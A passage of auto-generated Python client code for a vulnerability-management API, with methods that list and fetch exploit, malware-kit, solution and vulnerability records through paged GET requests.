body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/exploits/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Exploit', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_exploit_vulnerabilities(self, id, **kwargs): # noqa: E501
"""Exploitable Vulnerabilities # noqa: E501
Returns the vulnerabilities exploitable by an exploit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_exploit_vulnerabilities(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the exploit. (required)
:return: ReferencesWithVulnerabilityNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_exploit_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_exploit_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
return data
def get_exploit_vulnerabilities_with_http_info(self, id, **kwargs): # noqa: E501
"""Exploitable Vulnerabilities # noqa: E501
Returns the vulnerabilities exploitable by an exploit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_exploit_vulnerabilities_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the exploit. (required)
:return: ReferencesWithVulnerabilityNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_exploit_vulnerabilities" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_exploit_vulnerabilities`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/exploits/{id}/vulnerabilities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReferencesWithVulnerabilityNaturalIDLink', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_exploits(self, **kwargs): # noqa: E501
"""Exploits # noqa: E501
Returns all known exploits. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_exploits(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfExploit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_exploits_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_exploits_with_http_info(**kwargs) # noqa: E501
return data
def get_exploits_with_http_info(self, **kwargs): # noqa: E501
"""Exploits # noqa: E501
Returns all known exploits. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_exploits_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfExploit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_exploits" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/exploits', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfExploit', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
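The page/size/sort trio is the standard paging contract shared by the list endpoints in this file. A sketch of draining every page, reusing api from the earlier sketch (the resources/page attribute names assume the generated PageOf*/PageInfo models, and the title field is illustrative):

page = 0
while True:
    result = api.get_exploits(page=page, size=100, sort=["title,ASC"])
    for exploit in result.resources:
        print(exploit.title)
    # PageInfo.total_pages tells us when the last page has been read.
    if page >= result.page.total_pages - 1:
        break
    page += 1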
def get_malware_kit(self, id, **kwargs): # noqa: E501
"""Malware Kit # noqa: E501
Returns the details for a malware kit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_malware_kit(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the malware kit. (required)
:return: MalwareKit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_malware_kit_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_malware_kit_with_http_info(id, **kwargs) # noqa: E501
return data
def get_malware_kit_with_http_info(self, id, **kwargs): # noqa: E501
"""Malware Kit # noqa: E501
Returns the details for a malware kit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_malware_kit_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the malware kit. (required)
:return: MalwareKit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_malware_kit" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_malware_kit`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/malware_kits/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MalwareKit', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_malware_kit_vulnerabilities(self, id, **kwargs): # noqa: E501
"""Malware Kit Vulnerabilities # noqa: E501
Returns the vulnerabilities that are susceptible to being attacked by a malware kit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_malware_kit_vulnerabilities(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the malware kit. (required)
:return: ReferencesWithVulnerabilityNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_malware_kit_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_malware_kit_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
return data
def get_malware_kit_vulnerabilities_with_http_info(self, id, **kwargs): # noqa: E501
"""Malware Kit Vulnerabilities # noqa: E501
Returns the vulnerabilities that are susceptible to being attacked by a malware kit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_malware_kit_vulnerabilities_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the malware kit. (required)
:return: ReferencesWithVulnerabilityNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_malware_kit_vulnerabilities" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_malware_kit_vulnerabilities`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/malware_kits/{id}/vulnerabilities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReferencesWithVulnerabilityNaturalIDLink', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_malware_kits(self, **kwargs): # noqa: E501
"""Malware Kits # noqa: E501
Returns all known malware kits. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_malware_kits(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfMalwareKit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_malware_kits_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_malware_kits_with_http_info(**kwargs) # noqa: E501
return data
def get_malware_kits_with_http_info(self, **kwargs): # noqa: E501
"""Malware Kits # noqa: E501
Returns all known malware kits. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_malware_kits_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfMalwareKit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_malware_kits" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/malware_kits', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfMalwareKit', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_prerequisite_solutions(self, id, **kwargs): # noqa: E501
"""Solution Prerequisites # noqa: E501
Returns the solutions that must be executed in order for a solution to resolve a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_prerequisite_solutions(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:return: ReferencesWithSolutionNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_prerequisite_solutions_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_prerequisite_solutions_with_http_info(id, **kwargs) # noqa: E501
return data
def get_prerequisite_solutions_with_http_info(self, id, **kwargs): # noqa: E501
"""Solution Prerequisites # noqa: E501
Returns the solutions that must be executed in order for a solution to resolve a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_prerequisite_solutions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:return: ReferencesWithSolutionNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_prerequisite_solutions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_prerequisite_solutions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/solutions/{id}/prerequisites', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReferencesWithSolutionNaturalIDLink', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_solution(self, id, **kwargs): # noqa: E501
"""Solution # noqa: E501
Returns the details for a solution that can remediate one or more vulnerabilities. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_solution(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:return: Solution
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_solution_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_solution_with_http_info(id, **kwargs) # noqa: E501
return data
def get_solution_with_http_info(self, id, **kwargs): # noqa: E501
"""Solution # noqa: E501
Returns the details for a solution that can remediate one or more vulnerabilities. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_solution_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:return: Solution
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_solution" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_solution`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/solutions/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Solution', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_solutions(self, **kwargs): # noqa: E501
"""Solutions # noqa: E501
Returns the details for all solutions. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_solutions(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: ResourcesSolution
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_solutions_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_solutions_with_http_info(**kwargs) # noqa: E501
return data
def get_solutions_with_http_info(self, **kwargs): # noqa: E501
"""Solutions # noqa: E501
Returns the details for all solutions. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_solutions_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: ResourcesSolution
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_solutions" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/solutions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResourcesSolution', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
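# Usage sketch for the paging parameters documented above (values are
# illustrative). Because `sort` is registered with collection format 'multi',
# each list element is sent as its own `sort=` query parameter:
#
#     first_page = api.get_solutions(page=0, size=100, sort=['id,ASC'])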
def get_superseded_solutions(self, id, **kwargs): # noqa: E501
"""Superseded Solutions # noqa: E501
Returns the solutions that are superseded by this solution. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_superseded_solutions(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:return: ResourcesSolution
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_superseded_solutions_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_superseded_solutions_with_http_info(id, **kwargs) # noqa: E501
return data
def get_superseded_solutions_with_http_info(self, id, **kwargs): # noqa: E501
"""Superseded Solutions # noqa: E501
Returns the solutions that are superseded by this solution. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_superseded_solutions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:return: ResourcesSolution
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_superseded_solutions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_superseded_solutions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/solutions/{id}/supersedes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResourcesSolution', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_superseding_solutions(self, id, **kwargs): # noqa: E501
"""Superseding Solutions # noqa: E501
Returns the solutions that supersede this solution. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_superseding_solutions(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:param bool rollup: Whether to return only highest-level \"rollup\" superseding solutions.
:return: ResourcesSolution
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_superseding_solutions_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_superseding_solutions_with_http_info(id, **kwargs) # noqa: E501
return data
def get_superseding_solutions_with_http_info(self, id, **kwargs): # noqa: E501
"""Superseding Solutions # noqa: E501
Returns the solutions that supersede this solution. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_superseding_solutions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:param bool rollup: Whether to return only highest-level \"rollup\" superseding solutions.
:return: ResourcesSolution
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'rollup'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_superseding_solutions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_superseding_solutions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'rollup' in params:
query_params.append(('rollup', params['rollup'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/solutions/{id}/superseding', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResourcesSolution', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
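# Usage sketch for the optional `rollup` flag (placeholder id; `api` is an
# assumed client instance):
#
#     everything = api.get_superseding_solutions('example-solution-id')
#     top_level = api.get_superseding_solutions('example-solution-id', rollup=True)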
def get_vulnerabilities(self, **kwargs): # noqa: E501
"""Vulnerabilities # noqa: E501
Returns all vulnerabilities that can be assessed during a scan. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerabilities(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerability
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerabilities_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_vulnerabilities_with_http_info(**kwargs) # noqa: E501
return data
def get_vulnerabilities_with_http_info(self, **kwargs): # noqa: E501
"""Vulnerabilities # noqa: E501
Returns all vulnerabilities that can be assessed during a scan. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerabilities_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerability
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_vulnerabilities" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerabilities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
